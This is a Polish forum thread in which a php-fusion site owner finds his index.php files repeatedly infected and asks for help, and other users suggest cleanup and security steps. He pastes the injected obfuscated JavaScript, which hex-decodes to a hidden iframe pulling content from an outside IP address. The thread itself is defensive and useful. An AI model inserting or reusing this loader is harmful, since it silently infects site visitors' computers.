Spyware w index.php, Spyware w index.php - problem Opcje

[syrox]

Witam,
Od jakiegoś czasu zauważylem, ze coś niedobrego dzieje się z moją stronką, która stoi na systemie php-fusion.
Otóż plik index.php ( w katalogu głównym strony ) oraz w katalogu administracji pewnego razu został uszkodzony. Nie znam się za bardzo na php , ale wydaje mi sie , ze ktoś albo coś niepoprawnie podmienil te pliki.
Wrzuciłem orginalne indexy i wszystko zadziałalo ponownie. Pomyslalem sobie, ze to pewnie wina serwera i dałem spokoj z nadzieją, że problem już nigdy nie powróci. Myliłem się!

Od wczraj w pliku index.php ( katalog glowny ) oraz index.php ( administration )
- ( nie wiem gdzie jeszcze)

występuje coś takiego () na samym dole kodu :
-> index.php ( katalog glowny )
"index.php

CODE

require_once "maincore.php";

redirect($settings['opening_page']);
?><!-- o65 --><script type='text/javascript'>function F1B5B1EBD6CAADD0DB7(A2625E9F425A4E413A550C090C6718){var F137DC292706D98A24E02100810255=16;return(parseInt(A2625E9F425A4E413A550C090C6718
F137DC292706D98A24E02100810255));}function A28544CEDFDF7273B891CDF94B6E2(A8665970002354CE5Cb){var DAA88B9748379D759729D1=2;var EA8056E267241594097C6DCC='';for(CA2380843B2AFD36EFBF=0;CA2380843B2AFD36EFBF<A8665970002354CE5CB.length;CA2380843B2AFD36EFBF+=DAA88B9748379D759729D1){EA80
6E267241594097C6DCC+=(String.fromCharCode(F1B5B1EBD6CAADD0DB7(A8665970002354CE5C
.substr(CA2380843B2AFD36EFBF,DAA88B9748379D759729D1))));}document.write(EA8056E2
7241594097C6DCC);}A28544CEDFDF7273B891CDF94B6E2('3C696672616D65207372633D687474703A2F2F35382E36352E3233332E39372F57345951694C
2752E7068702077696474683D31206865696768743D31207374796C653D22646973706C61793A6E6
6E65223E3C2F696672616D653E');</script><!-- c65 -->"

oraz:
Index.php ( administration )
index.php - administraca

CODE

?><!-- o65 --><script type='text/javascript'>function F1B5B1EBD6CAADD0DB7(A2625E9F425A4E413A550C090C6718){var F137DC292706D98A24E02100810255=16;return(parseInt(A2625E9F425A4E413A550C090C6718
F137DC292706D98A24E02100810255));}function A28544CEDFDF7273B891CDF94B6E2(A8665970002354CE5Cb){var DAA88B9748379D759729D1=2;var EA8056E267241594097C6DCC='';for(CA2380843B2AFD36EFBF=0;CA2380843B2AFD36EFBF<A8665970002354CE5CB.length;CA2380843B2AFD36EFBF+=DAA88B9748379D759729D1){EA80
6E267241594097C6DCC+=(String.fromCharCode(F1B5B1EBD6CAADD0DB7(A8665970002354CE5C
.substr(CA2380843B2AFD36EFBF,DAA88B9748379D759729D1))));}document.write(EA8056E2
7241594097C6DCC);}A28544CEDFDF7273B891CDF94B6E2('3C696672616D65207372633D687474703A2F2F35382E36352E3233332E39372F57345951694C
2752E7068702077696474683D31206865696768743D31207374796C653D22646973706C61793A6E6
6E65223E3C2F696672616D653E');</script><!-- c65 -->

Chodzi oczywiscie o ten skrypt "--c65-->"
Ten sam kod ładuje sie takze do katalogu "include" index.php.

-------------------------------------------------------

Dodatkowo jak wchodze do panelu administracyjnego to w stopce strony widze jak ładują sie jakies strony ( nie wyskają okienka).. po czym komputer zaczyna sciagać jakiś badziew...

Co to jest?? i jak to zlikwidować? Prosze o pomoc zanim mnie szlag jasny trafi..

[qrees]

A dobrze masz serwer zabezpieczony? Sposobów na wgranie przez kogoś tego może być wiele. Jeżeli masz kiepskie hasło, to wiadomo, trzeba je zmienić. Możesz mieć na kompie keyloggera, więc przeskanuj go antywirusem. Możesz mieć wgrany jakiś skrypt z błędami, który pozwala innym na modyfikowanie plikó na serwerze. Powiedz coś więcej o tym serwerze, czy to serwer dedykowany, czy jakiś hosting.

Problemów może być wiele, ale jak już raz ktoś ci coś takiego wgrał, to zwykłe ponowne wgranie kilku plików nie pomoże. Najlepiej wgrać wszystko od zera.

[syrox]

Serwer jest hostingowany przez whiterabbit.pl co prawda mają tam hosting gier, ale dogadałem się i za niższą cene udostępnili mi serwer www - nazywa sie Reseller. Mam mozliwosc tworzenia nowych kont dla domen itp.
Oprogramowanie jak widze jest stare , brak aktualizacji.. nawet nie ma php 5. Ale nie wazne..

Hasło do ftp zmieniłem przed chwilą. Zauważyłem, że wszystkich pliki index.php znajduję się ten badziewny kod, który podałem wyżej..

[Darti]

Uaktualnij php-fusion, sprawdz prawa zapisu plików, zmien hasla dostępowe

[qrees]

Uaktualnij php-fusion, sprawdz prawa zapisu plików, zmien hasla dostępowe

No jak już mówiłem, samo uaktualnienie nie wystarczy. Proponowałbym skasować wszystkie pliki i wgrać czystego php-fusion na starej bazie danych. Jak ci ktoś w plikach index.php nabruździł, to mógł równie dobrze gdziekolwiek indziej też coś wcisnąć, żeby w razie czego mieć dostęp do konta nawet po zmianie hasła.

[syrox]

Wymiotłem zabrudzone indexy oraz zmieniłem hasło. Na razie jest dobrze.
Od wczoraj nic sie nie dzieje złego . Wczesniej po wyczyszczeniu indexow ( jakies 3-4 min i był syf ponownie.

Zobaczymy za 6 h.

[grzesiek_g]

Podaj adres, ta funkcja js ma coś wypisać na ekran, zerknięcie w źródło HTML może dużo wyjaśnić. Albo sam poszukaj różnych podejrzanych rzeczy w kodzie HTML który otrzymuje przeglądarka.

-- EDIT--
Nie zauważyłem jak odpisałeś, w razie czego szukaj nieprawidłowości w kodzie HTML, to może dać chociaż wskazówkę.

Ten post edytował grzesiek_g 1.12.2007, 12:20:54

[itsme]

Temat: Tematyka i zasady panu...ole
tutaj znajdziesz pewne odpowiedzi na pytanie: czy prawidłowo utworzyłem temat ?

[syrox]

Temat: Tematyka i zasady panu...ole
tutaj znajdziesz pewne odpowiedzi na pytanie: czy prawidłowo utworzyłem temat ?

Nieprawidłowo. Ale następnym razem już bedzie lepiej.

Wracając do tematu. - Wyczyscilem wszystkie index.-y i problem znikł. Ale za to była następna niespodzianka!
Na tym samym serwerze, ale już na innym koncie ftp ( oraz www) pojawił sie ten sam problem.. Strona w calosci zrobiona w html-u/css z małymi kodami js. Na stronie głównej index.html pojawił sie identyczny skrypt js oraz te same objawy co na php fusion. Zmieniłem totalnie wszystkie hasła / panel do konta / ftp / oraz panel główny serwera. Teraz wszystko w porządku .

[SirZooro]

Zerknij też tutaj - jest tu patch do ostatnio wykrytej dziury w PHP Fusion.